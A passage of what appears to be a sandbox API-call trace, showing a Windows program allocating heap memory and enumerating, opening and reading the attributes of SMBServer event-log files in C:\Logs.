0x71758 [0072.457] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0072.457] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0072.457] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0072.457] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45e18 | out: hHeap=0x20000) returned 1 [0072.457] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0072.457] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0072.457] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0072.457] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0072.457] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0072.457] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0072.457] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0072.457] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0072.457] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0072.457] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0072.457] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0072.457] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0072.457] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0072.457] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0072.457] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0072.457] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0072.458] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0072.458] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.458] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.458] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.458] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.458] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0072.458] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0072.458] AreFileApisANSI () returned 1 [0072.458] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx", lpUsedDefaultChar=0x0) returned 55 [0072.458] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0072.458] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.458] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.458] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0072.458] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0072.458] AreFileApisANSI () returned 1 [0072.458] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0072.458] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6e) returned 0x76188 [0072.458] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x76188, cchWideChar=55 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx") returned 55 [0072.458] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4connectivity.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0072.458] GetFileType (hFile=0x420) returned 0x1 [0072.458] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0072.459] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0072.459] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0072.459] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0072.459] CloseHandle (hObject=0x420) returned 1 [0072.459] AreFileApisANSI () returned 1 [0072.459] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0072.459] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6e) returned 0x75e40 [0072.459] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x75e40, cchWideChar=55 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx") returned 55 [0072.459] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4connectivity.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0072.459] GetFileType (hFile=0x420) returned 0x1 [0072.459] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0072.460] CloseHandle (hObject=0x420) returned 1 [0072.460] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0072.460] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0072.460] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0072.460] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0072.460] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0072.460] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0072.460] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0072.460] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0072.460] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0072.460] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x716f0 [0072.460] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0072.460] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0072.460] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0072.460] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x716f0 | out: hHeap=0x20000) returned 1 [0072.460] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0072.460] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0072.460] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0072.460] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0072.460] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0072.460] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0072.460] AreFileApisANSI () returned 1 [0072.460] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0072.460] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6e) returned 0x75d50 [0072.460] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x75d50, cchWideChar=55 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx") returned 55 [0072.460] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4connectivity.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb19dd19, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb19dd19, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0072.460] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0072.460] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0072.460] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0072.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0072.600] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.600] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.600] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb151873, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb151873, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-SMBServer%4Operational.evtx", cAlternateFileName="MI4B6B~1.EVT")) returned 1 [0072.600] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0072.600] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0072.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0072.600] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0072.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0072.600] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46208 [0072.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0072.600] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0072.600] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0072.600] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0072.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0072.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0072.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46208 | out: hHeap=0x20000) returned 1 [0072.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0072.601] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0072.601] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0072.601] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0072.601] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0072.601] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0072.601] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0072.601] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0072.601] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0072.601] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0072.601] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0072.601] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0072.601] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0072.601] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0072.601] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0072.601] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0072.601] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0072.601] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.601] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.601] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.601] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.601] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0072.601] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0072.601] AreFileApisANSI () returned 1 [0072.601] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx", lpUsedDefaultChar=0x0) returned 54 [0072.601] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0072.601] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.601] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.601] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0072.601] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0072.602] AreFileApisANSI () returned 1 [0072.602] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0072.602] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x75f30 [0072.602] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x75f30, cchWideChar=54 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx") returned 54 [0072.602] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0072.602] GetFileType (hFile=0x418) returned 0x1 [0072.602] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0072.602] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0072.602] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0072.602] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0072.603] CloseHandle (hObject=0x418) returned 1 [0072.603] AreFileApisANSI () returned 1 [0072.603] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0072.603] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x75e40 [0072.603] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x75e40, cchWideChar=54 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx") returned 54 [0072.603] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0072.603] GetFileType (hFile=0x418) returned 0x1 [0072.603] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0072.603] CloseHandle (hObject=0x418) returned 1 [0072.603] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0072.603] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0072.603] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0072.603] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0072.603] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0072.603] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0072.603] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0072.603] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0072.603] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0072.603] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0072.603] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0072.604] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0072.604] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0072.604] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0072.604] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0072.604] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0072.604] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0072.604] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0072.604] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0072.604] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0072.604] AreFileApisANSI () returned 1 [0072.604] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0072.604] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x75b70 [0072.604] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x75b70, cchWideChar=54 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx") returned 54 [0072.604] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4operational.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb151873, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb151873, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0072.604] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0072.604] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0072.604] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0072.604] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0072.604] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.604] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.604] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb177aca, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb177aca, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-SMBServer%4Security.evtx", cAlternateFileName="MI7709~1.EVT")) returned 1 [0072.604] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0072.604] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0072.604] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0072.604] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69490 [0072.604] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0072.604] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45fd8 [0072.604] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69490 | out: hHeap=0x20000) returned 1 [0072.604] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0072.604] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0072.604] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0072.604] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0072.604] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0072.604] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45fd8 | out: hHeap=0x20000) returned 1 [0072.605] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0072.605] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0072.605] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0072.605] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0072.605] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0072.605] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0072.605] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0072.605] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0072.605] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0072.605] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0072.605] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 